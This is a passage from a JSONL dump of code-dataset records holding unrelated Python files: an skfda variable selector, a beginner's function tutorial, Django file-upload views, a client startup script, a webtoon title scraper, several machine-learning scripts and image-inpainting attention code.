skfda.preprocessing.dim_reduction.variable_selection.\\\n ... maxima_hunting import select_local_maxima\n >>> from skfda.datasets import make_gaussian_process\n >>> from functools import partial\n >>> import skfda\n >>> import numpy as np\n\n We create trajectories from two classes, one with zero mean and the\n other with a peak-like mean. Both have Brownian covariance.\n\n >>> n_samples = 10000\n >>> n_features = 100\n >>>\n >>> def mean_1(t):\n ... return (np.abs(t - 0.25)\n ... - 2 * np.abs(t - 0.5)\n ... + np.abs(t - 0.75))\n >>>\n >>> X_0 = make_gaussian_process(n_samples=n_samples // 2,\n ... n_features=n_features,\n ... random_state=0)\n >>> X_1 = make_gaussian_process(n_samples=n_samples // 2,\n ... n_features=n_features,\n ... mean=mean_1,\n ... random_state=1)\n >>> X = skfda.concatenate((X_0, X_1))\n >>>\n >>> y = np.zeros(n_samples)\n >>> y [n_samples // 2:] = 1\n\n Select the relevant points to distinguish the two classes\n\n >>> local_maxima_selector = partial(select_local_maxima, order=10)\n >>> mh = variable_selection.MaximaHunting(\n ... local_maxima_selector=local_maxima_selector)\n >>> _ = mh.fit(X, y)\n >>> point_mask = mh.get_support()\n >>> points = X.grid_points[0][point_mask]\n >>> np.allclose(points, [0.5], rtol=0.1)\n True\n\n Apply the learned dimensionality reduction\n\n >>> X_dimred = mh.transform(X)\n >>> len(X.grid_points[0])\n 100\n >>> X_dimred.shape\n (10000, 1)\n\n References:\n\n .. [1] J. R. Berrendero, A. Cuevas, and J. L. Torrecilla, “Variable\n selection in functional data classification: a maxima-hunting\n proposal,” STAT SINICA, vol. 26, no. 2, pp. 619–638, 2016,\n doi: 10.5705/ss.202014.0014.\n\n '''\n\n def __init__(self,\n dependence_measure=dcor.u_distance_correlation_sqr,\n local_maxima_selector=select_local_maxima):\n self.dependence_measure = dependence_measure\n self.local_maxima_selector = local_maxima_selector\n\n def fit(self, X: FDataGrid, y):\n\n self.features_shape_ = X.data_matrix.shape[1:]\n self.dependence_ = _compute_dependence(\n X.data_matrix, y,\n dependence_measure=self.dependence_measure)\n\n self.indexes_ = self.local_maxima_selector(self.dependence_)\n\n sorting_indexes = np.argsort(self.dependence_[self.indexes_])[::-1]\n self.sorted_indexes_ = self.indexes_[sorting_indexes]\n\n return self\n\n def get_support(self, indices: bool=False):\n if indices:\n return self.indexes_\n else:\n mask = np.zeros(self.features_shape_[0:-1], dtype=bool)\n mask[self.indexes_] = True\n return mask\n\n def transform(self, X, y=None):\n\n sklearn.utils.validation.check_is_fitted(self)\n\n if X.data_matrix.shape[1:] != self.features_shape_:\n raise ValueError(\"The trajectories have a different number of \"\n \"points than the ones fitted\")\n\n return X.data_matrix[:, self.sorted_indexes_].reshape(X.n_samples, -1)\n","sub_path":"skfda/preprocessing/dim_reduction/variable_selection/maxima_hunting.py","file_name":"maxima_hunting.py","file_ext":"py","file_size_in_byte":7292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"33060188","text":"import math\n\nprint(abs(-20))\nprint(max(2, 3, 1, -5))\n\n# data type convert\nprint(int('123'))\nprint(int(12.34))\nprint(float('12.34'))\nprint(str(1.23))\nprint(bool(1))\nprint(bool(''))\nprint(hex(255))\nprint(hex(1000))\n\n\n# function definition isinstance(): data type check\ndef my_abs(x):\n if not isinstance(x, (int, float)):\n raise TypeError('bad operand type')\n if x >= 0:\n return x\n else:\n return -x\n\nprint(my_abs(-99))\n\n\n# null function\ndef nop():\n pass\n\n\n# return more than one value\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\nprint(move(1, 1, 10, math.pi / 2))\n\nprint(math.sqrt(2))\n\n\n# process ax**2 + bx + c = 0\ndef quadratic(a, b, c):\n if not (isinstance(a, (int, float)) and isinstance(b, (int, float)) and isinstance(c, (float, int))):\n raise TypeError('Bad Operand Type')\n else:\n d = b ** 2 - 4 * a * c\n if d > 0:\n x1 = (-b + math.sqrt(d)) / (2 * a)\n x2 = (-b - math.sqrt(d)) / (2 * a)\n return '两个不同的解: x1 = %.2f, x2 = %.2f' % (x1, x2)\n elif d == 0:\n return '两个相同解: x1 = x2 = %.2f' % (-b / (2 * a))\n else:\n return '无解'\n\nprint(quadratic(1, 5, 1))\nprint(quadratic(1, 2, 3))\nprint(quadratic(1, 4, 4))\n# print(quadratic(1, 4, '4'))\n\n# 位置参数\n# def power(x):\n# return x * x\n# print(power(9))\n\n\n# 默认参数\ndef power(x, n=2):\n s = 1\n while n > 0:\n n = n - 1\n s = s * x\n return s\n\nprint(power(9, 3))\nprint(power(9))\n\n\ndef enroll(name, gender, age=18, city='Shanghai'):\n print('name:', name)\n print('gender:', gender)\n print('age:', age)\n print('city:', city)\n\nenroll('Tia', 'F')\nenroll('Ezreal', 'M', 25, 'Zhejiang')\n\n\ndef add_end(l=[]):\n l.append('END')\n return l\n\nprint(add_end())\nprint(add_end())\n\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\n\nprint(add_end())\nprint(add_end())\nprint(add_end(['a', 'b']))\n\n# def calc(numbers):\n# sum = 0\n# for n in numbers:\n# sum = sum + n * n\n# return sum\n#\n# print(calc([1, 3, 5, 7]))\n\n\n# 可变参数\ndef calc(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\nprint(calc(1, 3, 5, 7))\nnums = [1, 3, 5, 7]\nprint(calc(*nums))\nprint(calc(nums[0], nums[1], nums[2], nums[3]))\n\n\n# 关键字参数\ndef person(name, age, **kw):\n if 'city' in kw:\n pass\n if 'job' in kw:\n pass\n print('name:', name, 'age:', age, 'other:', kw)\n\nperson('Tia', 18, weight=100)\nperson('Adam', 45, gender='M', job='Engineer')\nextra = {'city': 'Beijing', 'job': 'Engineer'}\nperson('Jack', 24, city=extra['city'], job=extra['job'])\nperson('Jack', 24, **extra)\n\n\n# 命名关键字参数\ndef person2(name, age, *, city, job):\n print(name, age, city, job)\n\nperson2('Suki', 25, city='Beijing', job='Engineer')\n\n\ndef person3(name, age, *args, city='Beijing', job):\n print(name, age, args, city, job)\n\nperson3('Suki', 25, 'sports', city='Shanghai', job='Q')\n\n\n# 参数组合 参数定义的顺序必须是:必选参数、默认参数、可变参数、命名关键字参数和关键字参数\ndef f1(a, b, c=0, *args, **kw):\n print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)\n\nf1(1, 2)\nf1(1, 2, c=3)\nf1(1, 2, 3, 'a', 'b')\nf1(1, 2, 3, 'a', 'b', x=99)\nf2(1, 2, d=99, ext=None)\n\nargs = (1, 2, 3, 4)\nkw = {'d': 99, 'x': '#'}\nf1(*args, **kw)\nargs = (1, 2, 3)\nkw = {'d': 88, 'x': '#'}\nf2(*args, **kw)\n\n\n# recursion\ndef fact(n):\n if n == 1:\n return 1\n return n * fact(n - 1)\n\nprint(fact(9))\nprint(fact(10))\n\n\n# Hanoi\ndef move(n, a, b, c):\n if n == 1:\n print('%s -> %s' % (a, c))\n else:\n move(n - 1, a, c, b)\n print('%s -> %s' % (a, c))\n move(n - 1, b, a, c)\n\nmove(3, 'A', 'B', 'C')\nmove(5, 'Tia', 'Suki', 'Ella')\n","sub_path":"learnPython/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"347305037","text":"# -*- coding: utf8 -*- \nfrom django.http import HttpResponse\nfrom django.shortcuts import render,render_to_response\nimport json\nfrom django import forms\nfrom django.core.files.base import ContentFile \nfrom django.views.decorators.csrf import csrf_exempt\nimport time\nimport os\nfrom register.models import *\nfrom register.form import *\n@csrf_exempt\ndef getUpId(request):\n\ttry:\n\t\tif request.method == 'POST':\n\t\t\tpost = request.POST\n\t\t\ttask = Task()\n\t\t\ttask.createTime = post['createTime']\n\t\t\ttask.save()\n\t\t\treturn HttpResponse(Form(0,task.id))\n\texcept:\n\t\treturn HttpResponse(Form(1,\"\"))\n\n@csrf_exempt\ndef upJar(request):\n\ttry:\n\t\tif request.method == 'POST':\n\t\t\tpost = request.POST\n\t\t\tNumber = post['number']\n\t\t\tuser = User.objects.get(number = Number)\n\t\t\tjarfile = request.FILES.get(\"jarfile\")\n\t\t\ttask = Task.objects.get(id = post['id'])\n\t\t\ttask.user = user\n\t\t\taddJar(jarfile,task,post['id'])\n\t\t\ttask.save()\n\t\t\treturn HttpResponse(Form(0,task.id))\n\texcept:\n\t\treturn HttpResponse(Form(1,\"\"))\n\n\n@csrf_exempt\ndef upInData(request):\n\ttry:\n\t\tif request.method == 'POST':\n\t\t\tpost = request.POST\n\t\t\tNumber = post['number']\n\t\t\tuser = User.objects.get(number = Number)\n\t\t\tinfile = request.FILES.get(\"infile\")\n\t\t\t# jarfile = request.FILES.get(\"jarfile\")\n\t\t\ttask = Task.objects.get(id = post['id'])\n\t\t\ttask.user = user\n\t\t\t# addJar(jarfile,task)\n\t\t\taddInData(infile,task)\n\t\t\ttask.save()\n\t\t\treturn HttpResponse(Form(0,task.id))\n\texcept:\n\t\treturn HttpResponse(Form(1,\"\"))\n\n\n\n\n@csrf_exempt\ndef addJar(file , task ,id):\n\tfile_name = ''\n\ttry:\n\t\tpath = Path + 'media/addJar/'\n\t\tif not os.path.exists(path):\n\t\t\tos.mkdir(path)\n\t\tfn = time.strftime(\"%Y%m%d%H%M%S\")\n\t\tfile_name = path + str(id) + '.jar'\n\t\tdestination = open(file_name,'wb')\n\t\tfor chunk in file.chunks():\n\t\t\tdestination.write(chunk)\n\t\tdestination.close()\n\t\ttask.jar = Url + file_name\n\texcept:\n\t\tpass\n@csrf_exempt\ndef addInData(file,task):\n\tfile_name = ''\n\ttry:\n\t\tpath = Path+'media/addInData/'\n\t\tif not os.path.exists(path):\n\t\t\tos.mkdir(path)\n\t\tfn = time.strftime(\"%Y%m%d%H%M%S\")\n\t\tfile_name = path + str(task.user.number) + '.in'\n\t\tdestination = open(file_name,'wb')\n\t\tfor chunk in file.chunks():\n\t\t\tdestination.write(chunk)\n\t\tdestination.close()\n\t\ttask.indata = Url + file_name\n\texcept:\n\t\tpass","sub_path":"achieveTask/upTask.py","file_name":"upTask.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"438023498","text":"# stdlib\nimport argparse\nimport logging\nimport logging.config\nimport signal\nimport sys\nimport os\n\n# third party lib\nimport requests\n\n# Internal lib\nfrom client.lib import shared\nfrom lib import settings\nimport worker\nfrom worker import factory\nfrom lib.logging_config import return_client_config\n\n# Routes\n\nserver_host = settings.ServerHTTP.external_host\nserver_port = settings.ServerHTTP.port\n\n\nclass BaseURL(object):\n __instance = None\n\n @staticmethod\n def get_instance(is_dev_env):\n if BaseURL.__instance is None:\n BaseURL(is_dev_env)\n return BaseURL.__instance\n\n def __init__(self, is_dev_env):\n if BaseURL.__instance is not None:\n return # Short circuit instantiation\n if is_dev_env:\n self.url = f'http://{server_host}:{server_port}/api'\n else:\n self.url = f'https://{server_host}:{server_port}/api'\n BaseURL.__instance = self\n\n\ndef parse_args():\n client_names = list(map(lambda x: x['name'], settings.ClientHTTP.clients))\n\n parser = argparse.ArgumentParser(description='CWS client')\n parser.add_argument('--name',\n type=str,\n help='Name of the client to start.',\n choices=client_names,\n required=True)\n \"\"\"\n The plinkfile is not of type argparse.FileType, as the base name won't exist\n\n e.g. popres1 is what we use to get popres1.[ind, bim, bam, fam], but popres1 doesn't exist.\n \"\"\"\n parser.add_argument('--plinkfile',\n type=str,\n help='The plinkfile to analyze',\n required=True)\n parser.add_argument('--port', type=int, help='[OPTIONAL] Override the default port')\n parser.add_argument('--external_host', type=str, help='[OPTIONAL] Override the default host used by '\n 'external systems to access this client. Defaults to '\n f'{settings.ClientHTTP.default_external_host}')\n parser.add_argument('--max_len', type=int, help='[OPTIONAL] Maximum content length for a given request.'\n f'Defaults to {settings.ClientHTTP.default_max_content_length} b')\n parser.add_argument('--listen_host', type=str, help='[OPTIONAL] Override the default host on which this client'\n 'should listen. Defaults to '\n f'{settings.ClientHTTP.default_listen_host}')\n parser.add_argument('--dev', type=bool, default=False, help='[OPTIONAL] Specify a development environment. '\n 'WARNING: this will bypass security checks.')\n\n return parser.parse_args()\n\n\ndef setup_logging(client_name):\n # Sorry in advance - the below mixes two different mini formats!\n fmt = f'[%(levelname)-5.5s] %(asctime)s [{client_name:10}] %(message)s'\n logging.basicConfig(level=logging.INFO, format=fmt, style='%')\n err_fmt = f'[%(levelname)-5.5s] %(asctime)s [{client_name:10}] %(pathname)-100.100s :: %(lineno)s => %(message)s'\n logging.basicConfig(level=logging.ERROR, format=err_fmt, style='%')\n\n\ndef configure_client(client, args):\n if args.external_host is not None:\n client['external_host'] = args.external_host\n if args.port is not None:\n client['port'] = args.port\n if args.listen_host is not None:\n client['listen_host'] = args.listen_host\n if args.max_len is not None:\n client['max_content_length'] = args.max_len\n if args.dev:\n client['ENV'] = 'development'\n os.environ[\"FLASK_ENV\"] = \"development\"\n client['plinkfile'] = args.plinkfile\n shared.set_plinkfile(args.plinkfile)\n\n return client\n\n\ndef register_self(client, server_url):\n url = f'{server_url}/clients'\n logging.info(f\"Server url: {url}\")\n try:\n registered_clients = requests.get(url).json()\n self_name = client['name']\n except Exception as e:\n logging.error('Error getting list of registered clients from server')\n logging.error(e)\n return False\n try:\n # Already registered, no need to register again\n next(filter(lambda x: x['name'] == self_name, registered_clients['msg']))\n logging.info('Already registered with server, not attempting to register again.')\n except StopIteration:\n # Not registered\n requests.post(url, json=client)\n logging.info('Successfully registered self with server')\n except Exception as e:\n logging.error(e)\n return False\n return True\n\n\ndef teardown(signum, frame, app):\n try:\n client = app.config['client']\n base_url = BaseURL.get_instance(None).url # Should always be initialised when we get here; passing None is OK\n url = f'{base_url}/clients/{client[\"name\"]}'\n requests.delete(url)\n sys.exit(0)\n except Exception as e:\n logging.error('Ran into unexpected error during teardown')\n logging.error(e)\n sys.exit(1)\n\n\ndef main():\n args = parse_args()\n client = next(filter(lambda x: x['name'] == args.name, settings.ClientHTTP.clients))\n logging_config = return_client_config(args.name+\".log\")\n logging.config.dictConfig(logging_config)\n\n app = factory.create_app(celery=worker.celery)\n app.config.update(\n CELERY_BROKER_URL='redis://localhost:6379',\n CELERY_RESULT_BACKEND='redis://localhost:6379'\n )\n\n # Overrides\n client = configure_client(client, args)\n\n app.config['MAX_CONTENT_LENGTH'] = client['max_content_length']\n app.config['client'] = client # Store configuration for later use\n if args.dev:\n app.config['ENV'] = 'development'\n\n # Handle a teardown on sigint/sigterm\n def _teardown(signum, frame):\n teardown(signum, frame, app)\n signal.signal(signal.SIGINT, _teardown)\n signal.signal(signal.SIGTERM, _teardown)\n\n server_url = BaseURL.get_instance(args.dev).url\n if not register_self(client, server_url):\n logging.error('Could not register self with server, exiting...')\n sys.exit(1)\n\n app.run(host=client['listen_host'], port=client['port'], threaded=False)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/client/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"109408149","text":"from lexical.common.vocabulary import *\nfrom lexical.common.word_breaker import *\n\nclass Document:\n\n def __init__(self, lang='english'):\n self.vocabulary = Vocabulary()\n self.word_breaker = WordBreaker(lang)\n\n self.raw_words = []\n self.raw_sentences = []\n\n def load_data(self, filename, delim='\\n'):\n\n # load file\n f = open(filename, 'r', encoding='utf-8').read()\n\n # split whole document\n sentences = f.split(delim)\n\n # split each sentence\n for sentence in sentences:\n raw_words = self.word_breaker.get_words(sentence)\n for raw_word in raw_words:\n self.raw_words.append(raw_word)\n\n self.raw_sentences.append(raw_words)\n\n # build vocabulary\n self.vocabulary.load_sentences(self.raw_sentences)\n\n def load_sentences(self, sentences):\n self.vocabulary.load_sentences(sentences)\n\n def load_words(self, words):\n self.vocabulary.load_words(words)\n\n def get_words(self):\n \"\"\"\n Get original words\n\n :return:\n \"\"\"\n\n return self.raw_words\n\n def get_ids(self):\n \"\"\"\n Get word ids\n\n :return:\n \"\"\"\n\n ids = []\n for word in self.raw_words:\n word_id = self.vocabulary.get_id(word)\n ids.append(word_id)\n\n return ids\n\nif __name__ == '__main__':\n\n doc = Document()\n doc.load_data('../../corpus_toy/english/document/ptb/ptb.train.txt')\n\n for word_id in doc.get_ids()[:100]:\n print(doc.vocabulary.get_word(word_id), word_id)\n","sub_path":"nlp/lexical/common/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"319437996","text":"from sklearn.neighbors import KNeighborsClassifier\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport numpy as np\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, classification_report, confusion_matrix\r\n\r\ndata = pd.read_csv(\"data_input/winner_45.csv\")\r\ntest = pd.read_csv(\"data_input/real.csv\")\r\ndata.drop(data.index[len(data) - 1], inplace=True)\r\ndata.drop(data.index[len(data) - 1], inplace=True)\r\n\r\nsvc = 0\r\nknc = 0\r\nk = 0\r\n\r\nX = data.drop(['g_next_serve', 'fav', 'winner', 'of_q', 'fo_q'], axis=1)\r\nY = np.array(data['winner'])\r\n# X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0)\r\nXT = test.drop(['g_next_serve', 'fav', 'winner', 'of_q', 'fo_q'], axis=1)\r\nYT = np.array(test['winner'])\r\n\r\n\r\nneigh = KNeighborsClassifier(n_neighbors=1)\r\nneigh.fit(X, Y)\r\n\r\nclf = SVC(gamma='auto')\r\nclf.fit(X, Y)\r\n\r\n\r\n# y_pred = clf.predict(XT)\r\n# y_pred = neigh.predict(XT)\r\ndata = pd.DataFrame()\r\ndata['svc'] = clf.predict(XT)\r\ndata['neigh'] = neigh.predict(XT)\r\ndata['ans'] = YT\r\nprint(data)\r\n\r\n\r\n","sub_path":"real_winner.py","file_name":"real_winner.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"109741855","text":"import rospy\nfrom styx_msgs.msg import TrafficLight\nimport tensorflow as tf\nimport cv2\nimport os\nfrom model import Model, image_width, image_height\nfrom keras.preprocessing.image import img_to_array\nimport numpy as np\nimport scipy\n\nclass TLClassifier(object):\n def __init__(self):\n \n # Counters for writing images\n self.red_image_number = 0\n self.yellow_image_number = 0\n self.green_image_number = 0\n self.unknown_image_number = 0\n\n self.model = Model()\n self.model.load_weights(\"light_classification/model.h5\")\n self.graph = tf.get_default_graph()\n\n\n def get_classification(self, image, traffic_light_state_truth):\n \"\"\"Determines the color of the traffic light in the image\n\n Args:\n image (cv::Mat): image containing the traffic light\n\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n \n # Time to run the network?\n INFERENCE = True\n if INFERENCE:\n image = scipy.misc.imresize(image, (image_height, image_width))\n image = img_to_array(image)\n image /= 255.0\n image = np.expand_dims(image, axis=0)\n with self.graph.as_default():\n preds = self.model.predict(image)[0]\n #print(preds)\n prediction = np.argmax(preds)\n #rospy.loginfo(\"Model says: \" + str(prediction))\n if prediction == 0: return TrafficLight.RED\n if prediction == 1: return TrafficLight.YELLOW\n if prediction == 2: return TrafficLight.GREEN\n return TrafficLight.UNKNOWN\n\n # Save training data\n else:\n try:\n os.makedirs(\"new/red/\")\n os.makedirs(\"new/yellow/\")\n os.makedirs(\"new/green/\")\n os.makedirs(\"new/none/\")\n except:\n pass\n if traffic_light_state_truth == TrafficLight.RED:\n self.red_image_number += 1\n cv2.imwrite(\"new/red/image_\" + str(self.red_image_number) + \".png\", image)\n\n if traffic_light_state_truth == TrafficLight.YELLOW:\n self.yellow_image_number += 1\n cv2.imwrite(\"new/yellow/image_\" + str(self.yellow_image_number) + \".png\", image)\n \n if traffic_light_state_truth == TrafficLight.GREEN:\n self.green_image_number += 1\n cv2.imwrite(\"new/green/image_\" + str(self.green_image_number) + \".png\", image)\n \n if traffic_light_state_truth == TrafficLight.UNKNOWN:\n self.unknown_image_number += 1\n cv2.imwrite(\"new/none/image_\" + str(self.unknown_image_number) + \".png\", image)\n \n # Save\n return TrafficLight.UNKNOWN\n \n","sub_path":"ros/src/tl_detector/light_classification/tl_classifier.py","file_name":"tl_classifier.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"444749661","text":"from bs4 import BeautifulSoup #html 구조적으로 변환하자\nfrom urllib.request import urlopen #url에 해당하는 html 가져오자\n\nif __name__ == '__main__':\n #네이버 웹툰 > 신의 탑 제목 가져오자\n # data = urlopen(\"https://comic.naver.com/webtoon/list.nhn?titleId=183559\")\n data = urlopen(\"https://comic.naver.com/webtoon/list.nhn?titleId=651673\") #유미의 세포들\n soup = BeautifulSoup(data,\"lxml\")\n #print(soup)\n\n cartoon_titles = soup.find_all(\"td\",attrs={'class' : 'title'}) #ctd class = \"title\">\n html = \"\" #utf-8\n for title in cartoon_titles:\n t = title.find('a').text #제목 가져오자\n link = title.find('a').get(\"href\")\n link = \"http://comic.naver.com/\" + link\n # print(link)\n # print(\"\"+t+\"\")\n html+=\"\"+t+\"

\"\n html += \"\"\n outputSoup = BeautifulSoup(html, \"lxml\") #htmlstring -> BeautifulSoup 객체\n prettyhtml = str(outputSoup.prettify()) #html 줄 예쁘게\n with open(\"유미의세포들.html\",\"w\",encoding=\"utf-8\") as f:\n f.write(prettyhtml)\n\n\n #다음 웹툰 > 어쩌다 발견한 7월 제목 가져오자\n # data = urlopen(\"http://webtoon.daum.net/webtoon/view/findjuly\") #url -> httpResponse객체\n # soup = BeautifulSoup(data,\"lxml\")\n # #print(soup)\n #\n # cartoon_titles = soup.find_all(\"strong\", attrs={'class' : 'tit_wt'})\n # for title in cartoon_titles:\n # print(title)","sub_path":"IX.프로젝트/web_crawling.py","file_name":"web_crawling.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"23492817","text":"\"\"\"\nnetwork.py (13-12-20)\nhttps://github.com/styler00dollar/Colab-Global-and-Local-Inpainting/blob/master/model/network.py\n\nAttention.py (13-12-20)\nhttps://github.com/styler00dollar/Colab-Global-and-Local-Inpainting/blob/master/model/Attention.py\n\ntools.py (13-12-20)\nhttps://github.com/styler00dollar/Colab-Global-and-Local-Inpainting/blob/master/utils/tools.py\n\"\"\"\nimport os\nimport torch\nimport yaml\nimport numpy as np\n#from PIL import Image\n\nimport torch.nn.functional as F\nimport cv2\n\n# Change the values of tensor x from range [0, 1] to [-1, 1]\ndef normalize(x):\n return x.mul_(2).add_(-1)\n\ndef same_padding(images, ksizes, strides, rates):\n assert len(images.size()) == 4\n batch_size, channel, rows, cols = images.size()\n out_rows = (rows + strides[0] - 1) // strides[0]\n out_cols = (cols + strides[1] - 1) // strides[1]\n effective_k_row = (ksizes[0] - 1) * rates[0] + 1\n effective_k_col = (ksizes[1] - 1) * rates[1] + 1\n padding_rows = max(0, (out_rows-1)*strides[0]+effective_k_row-rows)\n padding_cols = max(0, (out_cols-1)*strides[1]+effective_k_col-cols)\n # Pad the input\n padding_top = int(padding_rows / 2.)\n padding_left = int(padding_cols / 2.)\n padding_bottom = padding_rows - padding_top\n padding_right = padding_cols - padding_left\n paddings = (padding_left, padding_right, padding_top, padding_bottom)\n images = torch.nn.ZeroPad2d(paddings)(images)\n return images\n\n\ndef extract_image_patches(images, ksizes, strides, rates, padding='same'):\n \"\"\"\n Extract patches from images and put them in the C output dimension.\n :param padding:\n :param images: [batch, channels, in_rows, in_cols]. A 4-D Tensor with shape\n :param ksizes: [ksize_rows, ksize_cols]. The size of the sliding window for\n each dimension of images\n :param strides: [stride_rows, stride_cols]\n :param rates: [dilation_rows, dilation_cols]\n :return: A Tensor\n \"\"\"\n assert len(images.size()) == 4\n assert padding in ['same', 'valid']\n batch_size, channel, height, width = images.size()\n\n if padding == 'same':\n images = same_padding(images, ksizes, strides, rates)\n elif padding == 'valid':\n pass\n else:\n raise NotImplementedError('Unsupported padding type: {}.\\\n Only \"same\" or \"valid\" are supported.'.format(padding))\n\n unfold = torch.nn.Unfold(kernel_size=ksizes,\n dilation=rates,\n padding=0,\n stride=strides)\n patches = unfold(images)\n return patches # [N, C*k*k, L], L is the total number of such blocks\n\n\ndef local_patch(x, bbox_list):\n assert len(x.size()) == 4\n patches = []\n for i, bbox in enumerate(bbox_list):\n t, l, h, w = bbox\n patches.append(x[i, :, t:t + h, l:l + w])\n return torch.stack(patches, dim=0)\n\n\ndef reduce_mean(x, axis=None, keepdim=False):\n if not axis:\n axis = range(len(x.shape))\n for i in sorted(axis, reverse=True):\n x = torch.mean(x, dim=i, keepdim=keepdim)\n return x\n\n\ndef reduce_std(x, axis=None, keepdim=False):\n if not axis:\n axis = range(len(x.shape))\n for i in sorted(axis, reverse=True):\n x = torch.std(x, dim=i, keepdim=keepdim)\n return x\n\n\ndef reduce_sum(x, axis=None, keepdim=False):\n if not axis:\n axis = range(len(x.shape))\n for i in sorted(axis, reverse=True):\n x = torch.sum(x, dim=i, keepdim=keepdim)\n return x\n\ndef deprocess(img):\n img = img.add_(1).div_(2)\n return img\n\n\n# get configs\ndef get_config(config):\n with open(config, 'r') as stream:\n return yaml.load(stream)\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n#from utils.tools import *\n\n# Contextual attention implementation is borrowed from IJCAI 2019 : \"MUSICAL: Multi-Scale Image Contextual Attention Learning for Inpainting\".\n# Original implementation causes bad results for Pytorch 1.2+.\nclass GlobalLocalAttention(nn.Module):\n def __init__(self, in_dim, patch_size=3, propagate_size=3, stride=1):\n super(GlobalLocalAttention, self).__init__()\n self.patch_size = patch_size\n self.propagate_size = propagate_size\n self.stride = stride\n self.prop_kernels = None\n self.in_dim = in_dim\n self.feature_attention = GlobalAttention(in_dim)\n self.patch_attention = GlobalAttentionPatch(in_dim)\n\n def forward(self, foreground, mask, background=\"same\"):\n ###assume the masked area has value 1\n bz, nc, w, h = foreground.size()\n if background == \"same\":\n background = foreground.clone()\n mask = F.interpolate(mask, size=(h, w), mode='nearest')\n background = background * (1 - mask)\n foreground = self.feature_attention(foreground, background, mask)\n background = F.pad(background,\n [self.patch_size // 2, self.patch_size // 2, self.patch_size // 2, self.patch_size // 2])\n conv_kernels_all = background.unfold(2, self.patch_size, self.stride).unfold(3, self.patch_size,\n self.stride).contiguous().view(bz,\n nc,\n -1,\n self.patch_size,\n self.patch_size)\n\n mask_resized = mask.repeat(1, self.in_dim, 1, 1)\n mask_resized = F.pad(mask_resized,\n [self.patch_size // 2, self.patch_size // 2, self.patch_size // 2, self.patch_size // 2])\n mask_kernels_all = mask_resized.unfold(2, self.patch_size, self.stride).unfold(3, self.patch_size,\n self.stride).contiguous().view(\n bz,\n nc,\n -1,\n self.patch_size,\n self.patch_size)\n conv_kernels_all = conv_kernels_all.transpose(2, 1)\n mask_kernels_all = mask_kernels_all.transpose(2, 1)\n output_tensor = []\n for i in range(bz):\n feature_map = foreground[i:i + 1]\n\n # form convolutional kernels\n conv_kernels = conv_kernels_all[i] + 0.0000001\n mask_kernels = mask_kernels_all[i]\n conv_kernels = self.patch_attention(conv_kernels, conv_kernels, mask_kernels)\n norm_factor = torch.sum(conv_kernels ** 2, [1, 2, 3], keepdim=True) ** 0.5\n conv_kernels = conv_kernels / norm_factor\n\n conv_result = F.conv2d(feature_map, conv_kernels, padding=self.patch_size // 2)\n # print(conv_result.shape)\n if self.propagate_size != 1:\n if self.prop_kernels is None:\n self.prop_kernels = torch.ones([conv_result.size(1), 1, self.propagate_size, self.propagate_size])\n self.prop_kernels.requires_grad = False\n self.prop_kernels = self.prop_kernels.cuda()\n conv_result = F.conv2d(conv_result, self.prop_kernels, stride=1, padding=1, groups=conv_result.size(1))\n mm = (torch.mean(mask_kernels_all[i], dim=[1,2,3], keepdim=True)==0.0).to(torch.float32)\n mm = mm.permute(1,0,2,3).cuda()\n conv_result = conv_result * mm\n attention_scores = F.softmax(conv_result, dim=1)\n attention_scores = attention_scores * mm\n\n ##propagate the scores\n recovered_foreground = F.conv_transpose2d(attention_scores, conv_kernels, stride=1,\n padding=self.patch_size // 2)\n output_tensor.append(recovered_foreground)\n return torch.cat(output_tensor, dim=0)\n\n\nclass GlobalAttention(nn.Module):\n \"\"\" Self attention Layer\"\"\"\n\n def __init__(self, in_dim):\n super(GlobalAttention, self).__init__()\n self.chanel_in = in_dim\n\n self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.softmax = nn.Softmax(dim=-1) #\n self.rate = 1\n self.gamma = torch.tensor([1.0], requires_grad=True).cuda()\n\n def forward(self, a, b, c):\n m_batchsize, C, width, height = a.size() # B, C, H, W\n down_rate = int(c.size(2)//width)\n c = F.interpolate(c, scale_factor=1./down_rate*self.rate, mode='nearest')\n proj_query = self.query_conv(a).view(m_batchsize, -1, width * height).permute(0, 2, 1) # B, C, N -> B N C\n proj_key = self.key_conv(b).view(m_batchsize, -1, width * height) # B, C, N\n feature_similarity = 